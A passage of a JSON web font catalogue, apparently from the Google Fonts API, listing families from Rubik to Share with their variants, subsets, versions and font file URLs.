        "800italic": "http://fonts.gstatic.com/s/rubik/v11/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8vdFEUwdYPFkJ1O.ttf",
        "900italic": "http://fonts.gstatic.com/s/rubik/v11/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8v0FEUwdYPFkJ1O.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rubik Mono One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rubikmonoone/v9/UqyJK8kPP3hjw6ANTdfRk9YSN-8wRqQrc_j9.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ruda",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ruda/v13/k3kKo8YQJOpFgHQ1mQ5VkEbUKaJFsi_-2KiSGg-H.ttf",
        "500": "http://fonts.gstatic.com/s/ruda/v13/k3kKo8YQJOpFgHQ1mQ5VkEbUKaJ3si_-2KiSGg-H.ttf",
        "600": "http://fonts.gstatic.com/s/ruda/v13/k3kKo8YQJOpFgHQ1mQ5VkEbUKaKbtS_-2KiSGg-H.ttf",
        "700": "http://fonts.gstatic.com/s/ruda/v13/k3kKo8YQJOpFgHQ1mQ5VkEbUKaKitS_-2KiSGg-H.ttf",
        "800": "http://fonts.gstatic.com/s/ruda/v13/k3kKo8YQJOpFgHQ1mQ5VkEbUKaLFtS_-2KiSGg-H.ttf",
        "900": "http://fonts.gstatic.com/s/ruda/v13/k3kKo8YQJOpFgHQ1mQ5VkEbUKaLstS_-2KiSGg-H.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rufina",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rufina/v8/Yq6V-LyURyLy-aKyoxRktOdClg.ttf",
        "700": "http://fonts.gstatic.com/s/rufina/v8/Yq6W-LyURyLy-aKKHztAvMxenxE0SA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ruge Boogie",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rugeboogie/v11/JIA3UVFwbHRF_GIWSMhKNROiPzUveSxy.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ruluko",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ruluko/v8/xMQVuFNZVaODtm0pC6WzKX_QmA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rum Raisin",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rumraisin/v8/nwpRtKu3Ih8D5avB4h2uJ3-IywA7eMM.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ruslan Display",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ruslandisplay/v11/Gw6jwczl81XcIZuckK_e3UpfdzxrldyFvm1n.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Russo One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/russoone/v9/Z9XUDmZRWg6M1LvRYsH-yMOInrib9Q.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ruthie",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ruthie/v11/gokvH63sGkdqXuU9lD53Q2u_mQ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rye",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rye/v8/r05XGLJT86YDFpTsXOqx4w.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sacramento",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sacramento/v8/buEzpo6gcdjy0EiZMBUG0CoV_NxLeiw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sahitya",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sahitya/v5/6qLAKZkOuhnuqlJAaScFPywEDnI.ttf",
        "700": "http://fonts.gstatic.com/s/sahitya/v5/6qLFKZkOuhnuqlJAUZsqGyQvEnvSexI.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sail",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sail/v11/DPEjYwiBxwYJFBTDADYAbvw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Saira",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/saira/v5/mem-Ya2wxmKQyNFETZY_VrUfTck.ttf",
        "200": "http://fonts.gstatic.com/s/saira/v5/mem9Ya2wxmKQyNHobLYVeLkWVNBt.ttf",
        "300": "http://fonts.gstatic.com/s/saira/v5/mem9Ya2wxmKQyNGMb7YVeLkWVNBt.ttf",
        "regular": "http://fonts.gstatic.com/s/saira/v5/memwYa2wxmKQyOkgR5IdU6Uf.ttf",
        "500": "http://fonts.gstatic.com/s/saira/v5/mem9Ya2wxmKQyNHUbrYVeLkWVNBt.ttf",
        "600": "http://fonts.gstatic.com/s/saira/v5/mem9Ya2wxmKQyNH4abYVeLkWVNBt.ttf",
        "700": "http://fonts.gstatic.com/s/saira/v5/mem9Ya2wxmKQyNGcaLYVeLkWVNBt.ttf",
        "800": "http://fonts.gstatic.com/s/saira/v5/mem9Ya2wxmKQyNGAa7YVeLkWVNBt.ttf",
        "900": "http://fonts.gstatic.com/s/saira/v5/mem9Ya2wxmKQyNGkarYVeLkWVNBt.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Saira Condensed",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/sairacondensed/v6/EJRMQgErUN8XuHNEtX81i9TmEkrnwetA2omSrzS8.ttf",
        "200": "http://fonts.gstatic.com/s/sairacondensed/v6/EJRLQgErUN8XuHNEtX81i9TmEkrnbcpg8Keepi2lHw.ttf",
        "300": "http://fonts.gstatic.com/s/sairacondensed/v6/EJRLQgErUN8XuHNEtX81i9TmEkrnCclg8Keepi2lHw.ttf",
        "regular": "http://fonts.gstatic.com/s/sairacondensed/v6/EJROQgErUN8XuHNEtX81i9TmEkrfpeFE-IyCrw.ttf",
        "500": "http://fonts.gstatic.com/s/sairacondensed/v6/EJRLQgErUN8XuHNEtX81i9TmEkrnUchg8Keepi2lHw.ttf",
        "600": "http://fonts.gstatic.com/s/sairacondensed/v6/EJRLQgErUN8XuHNEtX81i9TmEkrnfc9g8Keepi2lHw.ttf",
        "700": "http://fonts.gstatic.com/s/sairacondensed/v6/EJRLQgErUN8XuHNEtX81i9TmEkrnGc5g8Keepi2lHw.ttf",
        "800": "http://fonts.gstatic.com/s/sairacondensed/v6/EJRLQgErUN8XuHNEtX81i9TmEkrnBc1g8Keepi2lHw.ttf",
        "900": "http://fonts.gstatic.com/s/sairacondensed/v6/EJRLQgErUN8XuHNEtX81i9TmEkrnIcxg8Keepi2lHw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Saira Extra Condensed",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/sairaextracondensed/v6/-nFsOHYr-vcC7h8MklGBkrvmUG9rbpkisrTri0jx9i5ss3a3.ttf",
        "200": "http://fonts.gstatic.com/s/sairaextracondensed/v6/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrJ2nR3ABgum-uoQ.ttf",
        "300": "http://fonts.gstatic.com/s/sairaextracondensed/v6/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrQ2rR3ABgum-uoQ.ttf",
        "regular": "http://fonts.gstatic.com/s/sairaextracondensed/v6/-nFiOHYr-vcC7h8MklGBkrvmUG9rbpkisrTT70L11Ct8sw.ttf",
        "500": "http://fonts.gstatic.com/s/sairaextracondensed/v6/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrG2vR3ABgum-uoQ.ttf",
        "600": "http://fonts.gstatic.com/s/sairaextracondensed/v6/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrN2zR3ABgum-uoQ.ttf",
        "700": "http://fonts.gstatic.com/s/sairaextracondensed/v6/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrU23R3ABgum-uoQ.ttf",
        "800": "http://fonts.gstatic.com/s/sairaextracondensed/v6/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrT27R3ABgum-uoQ.ttf",
        "900": "http://fonts.gstatic.com/s/sairaextracondensed/v6/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTra2_R3ABgum-uoQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Saira Semi Condensed",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/sairasemicondensed/v6/U9MN6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXdvaOM8rXT-8V8.ttf",
        "200": "http://fonts.gstatic.com/s/sairasemicondensed/v6/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXfDScMWg3j36Ebz.ttf",
        "300": "http://fonts.gstatic.com/s/sairasemicondensed/v6/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXenSsMWg3j36Ebz.ttf",
        "regular": "http://fonts.gstatic.com/s/sairasemicondensed/v6/U9MD6c-2-nnJkHxyCjRcnMHcWVWV1cWRRU8LYuceqGT-.ttf",
        "500": "http://fonts.gstatic.com/s/sairasemicondensed/v6/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXf_S8MWg3j36Ebz.ttf",
        "600": "http://fonts.gstatic.com/s/sairasemicondensed/v6/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXfTTMMWg3j36Ebz.ttf",
        "700": "http://fonts.gstatic.com/s/sairasemicondensed/v6/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXe3TcMWg3j36Ebz.ttf",
        "800": "http://fonts.gstatic.com/s/sairasemicondensed/v6/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXerTsMWg3j36Ebz.ttf",
        "900": "http://fonts.gstatic.com/s/sairasemicondensed/v6/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXePT8MWg3j36Ebz.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Saira Stencil One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sairastencilone/v2/SLXSc03I6HkvZGJ1GvvipLoYSTEL9AsMawif2YQ2.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Salsa",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/salsa/v10/gNMKW3FiRpKj-imY8ncKEZez.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sanchez",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sanchez/v8/Ycm2sZJORluHnXbITm5b_BwE1l0.ttf",
        "italic": "http://fonts.gstatic.com/s/sanchez/v8/Ycm0sZJORluHnXbIfmxR-D4Bxl3gkw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sancreek",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sancreek/v11/pxiHypAnsdxUm159X7D-XV9NEe-K.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sansita",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sansita/v5/QldONTRRphEb_-V7HBm7TXFf3qw.ttf",
        "italic": "http://fonts.gstatic.com/s/sansita/v5/QldMNTRRphEb_-V7LBuxSVNazqx2xg.ttf",
        "700": "http://fonts.gstatic.com/s/sansita/v5/QldLNTRRphEb_-V7JKWUaXl0wqVv3_g.ttf",
        "700italic": "http://fonts.gstatic.com/s/sansita/v5/QldJNTRRphEb_-V7LBuJ9Xx-xodqz_joDQ.ttf",
        "800": "http://fonts.gstatic.com/s/sansita/v5/QldLNTRRphEb_-V7JLmXaXl0wqVv3_g.ttf",
        "800italic": "http://fonts.gstatic.com/s/sansita/v5/QldJNTRRphEb_-V7LBuJ6X9-xodqz_joDQ.ttf",
        "900": "http://fonts.gstatic.com/s/sansita/v5/QldLNTRRphEb_-V7JJ2WaXl0wqVv3_g.ttf",
        "900italic": "http://fonts.gstatic.com/s/sansita/v5/QldJNTRRphEb_-V7LBuJzX5-xodqz_joDQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sansita Swashed",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-09-29",
      "files": {
        "300": "http://fonts.gstatic.com/s/sansitaswashed/v1/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW-ppbToVehmEa4Q.ttf",
        "regular": "http://fonts.gstatic.com/s/sansitaswashed/v1/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW7RpbToVehmEa4Q.ttf",
        "500": "http://fonts.gstatic.com/s/sansitaswashed/v1/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW4ZpbToVehmEa4Q.ttf",
        "600": "http://fonts.gstatic.com/s/sansitaswashed/v1/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW2pubToVehmEa4Q.ttf",
        "700": "http://fonts.gstatic.com/s/sansitaswashed/v1/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW1NubToVehmEa4Q.ttf",
        "800": "http://fonts.gstatic.com/s/sansitaswashed/v1/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSWzRubToVehmEa4Q.ttf",
        "900": "http://fonts.gstatic.com/s/sansitaswashed/v1/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSWx1ubToVehmEa4Q.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sarabun",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/sarabun/v8/DtVhJx26TKEr37c9YHZJmnYI5gnOpg.ttf",
        "100italic": "http://fonts.gstatic.com/s/sarabun/v8/DtVnJx26TKEr37c9aBBx_nwMxAzephhN.ttf",
        "200": "http://fonts.gstatic.com/s/sarabun/v8/DtVmJx26TKEr37c9YNpoulwm6gDXvwE.ttf",
        "200italic": "http://fonts.gstatic.com/s/sarabun/v8/DtVkJx26TKEr37c9aBBxUl0s7iLSrwFUlw.ttf",
        "300": "http://fonts.gstatic.com/s/sarabun/v8/DtVmJx26TKEr37c9YL5rulwm6gDXvwE.ttf",
        "300italic": "http://fonts.gstatic.com/s/sarabun/v8/DtVkJx26TKEr37c9aBBxNl4s7iLSrwFUlw.ttf",
        "regular": "http://fonts.gstatic.com/s/sarabun/v8/DtVjJx26TKEr37c9WBJDnlQN9gk.ttf",
        "italic": "http://fonts.gstatic.com/s/sarabun/v8/DtVhJx26TKEr37c9aBBJmnYI5gnOpg.ttf",
        "500": "http://fonts.gstatic.com/s/sarabun/v8/DtVmJx26TKEr37c9YOZqulwm6gDXvwE.ttf",
        "500italic": "http://fonts.gstatic.com/s/sarabun/v8/DtVkJx26TKEr37c9aBBxbl8s7iLSrwFUlw.ttf",
        "600": "http://fonts.gstatic.com/s/sarabun/v8/DtVmJx26TKEr37c9YMptulwm6gDXvwE.ttf",
        "600italic": "http://fonts.gstatic.com/s/sarabun/v8/DtVkJx26TKEr37c9aBBxQlgs7iLSrwFUlw.ttf",
        "700": "http://fonts.gstatic.com/s/sarabun/v8/DtVmJx26TKEr37c9YK5sulwm6gDXvwE.ttf",
        "700italic": "http://fonts.gstatic.com/s/sarabun/v8/DtVkJx26TKEr37c9aBBxJlks7iLSrwFUlw.ttf",
        "800": "http://fonts.gstatic.com/s/sarabun/v8/DtVmJx26TKEr37c9YLJvulwm6gDXvwE.ttf",
        "800italic": "http://fonts.gstatic.com/s/sarabun/v8/DtVkJx26TKEr37c9aBBxOlos7iLSrwFUlw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sarala",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sarala/v4/uK_y4riEZv4o1w9RCh0TMv6EXw.ttf",
        "700": "http://fonts.gstatic.com/s/sarala/v4/uK_x4riEZv4o1w9ptjI3OtWYVkMpXA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sarina",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sarina/v9/-F6wfjF3ITQwasLhLkDUriBQxw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sarpanch",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sarpanch/v6/hESy6Xt4NCpRuk6Pzh2ARIrX_20n.ttf",
        "500": "http://fonts.gstatic.com/s/sarpanch/v6/hES16Xt4NCpRuk6PziV0ba7f1HEuRHkM.ttf",
        "600": "http://fonts.gstatic.com/s/sarpanch/v6/hES16Xt4NCpRuk6PziVYaq7f1HEuRHkM.ttf",
        "700": "http://fonts.gstatic.com/s/sarpanch/v6/hES16Xt4NCpRuk6PziU8a67f1HEuRHkM.ttf",
        "800": "http://fonts.gstatic.com/s/sarpanch/v6/hES16Xt4NCpRuk6PziUgaK7f1HEuRHkM.ttf",
        "900": "http://fonts.gstatic.com/s/sarpanch/v6/hES16Xt4NCpRuk6PziUEaa7f1HEuRHkM.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Satisfy",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/satisfy/v11/rP2Hp2yn6lkG50LoOZSCHBeHFl0.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sawarabi Gothic",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "japanese",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v8",
      "lastModified": "2019-11-05",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sawarabigothic/v8/x3d4ckfVaqqa-BEj-I9mE65u3k3NBSk3E2YljQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sawarabi Mincho",
      "variants": [
        "regular"
      ],
      "subsets": [
        "japanese",
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2019-11-05",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sawarabimincho/v10/8QIRdiDaitzr7brc8ahpxt6GcIJTLahP46UDUw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Scada",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/scada/v9/RLpxK5Pv5qumeWJoxzUobkvv.ttf",
        "italic": "http://fonts.gstatic.com/s/scada/v9/RLp_K5Pv5qumeVJqzTEKa1vvffg.ttf",
        "700": "http://fonts.gstatic.com/s/scada/v9/RLp8K5Pv5qumeVrU6BEgRVfmZOE5.ttf",
        "700italic": "http://fonts.gstatic.com/s/scada/v9/RLp6K5Pv5qumeVJq9Y0lT1PEYfE5p6g.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Scheherazade",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "arabic",
        "latin"
      ],
      "version": "v19",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/scheherazade/v19/YA9Ur0yF4ETZN60keViq1kQgt5OohvbJ9A.ttf",
        "700": "http://fonts.gstatic.com/s/scheherazade/v19/YA9Lr0yF4ETZN60keViq1kQYC7yMjt3V_dB0Yw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Schoolbell",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/schoolbell/v11/92zQtBZWOrcgoe-fgnJIVxIQ6mRqfiQ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Scope One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/scopeone/v7/WBLnrEXKYFlGHrOKmGD1W0_MJMGxiQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Seaweed Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/seaweedscript/v8/bx6cNx6Tne2pxOATYE8C_Rsoe0WJ-KcGVbLW.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Secular One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "hebrew",
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/secularone/v5/8QINdiTajsj_87rMuMdKypDlMul7LJpK.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sedgwick Ave",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sedgwickave/v6/uK_04rKEYuguzAcSYRdWTJq8Xmg1Vcf5JA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sedgwick Ave Display",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sedgwickavedisplay/v6/xfuu0XPgU3jZPUoUo3ScvmPi-NapQ8OxM2czd-YnOzUD.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sen",
      "variants": [
        "regular",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sen/v2/6xKjdSxYI9_Hm_-MImrpLQ.ttf",
        "700": "http://fonts.gstatic.com/s/sen/v2/6xKudSxYI9__J9CoKkH1JHUQSQ.ttf",
        "800": "http://fonts.gstatic.com/s/sen/v2/6xKudSxYI9__O9OoKkH1JHUQSQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sevillana",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sevillana/v9/KFOlCnWFscmDt1Bfiy1vAx05IsDqlA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Seymour One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/seymourone/v8/4iCp6Khla9xbjQpoWGGd0myIPYBvgpUI.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Shadows Into Light",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/shadowsintolight/v10/UqyNK9UOIntux_czAvDQx_ZcHqZXBNQDcsr4xzSMYA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Shadows Into Light Two",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/shadowsintolighttwo/v8/4iC86LVlZsRSjQhpWGedwyOoW-0A6_kpsyNmlAvNGLNnIF0.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Shanti",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/shanti/v12/t5thIREMM4uSDgzgU0ezpKfwzA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Share",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
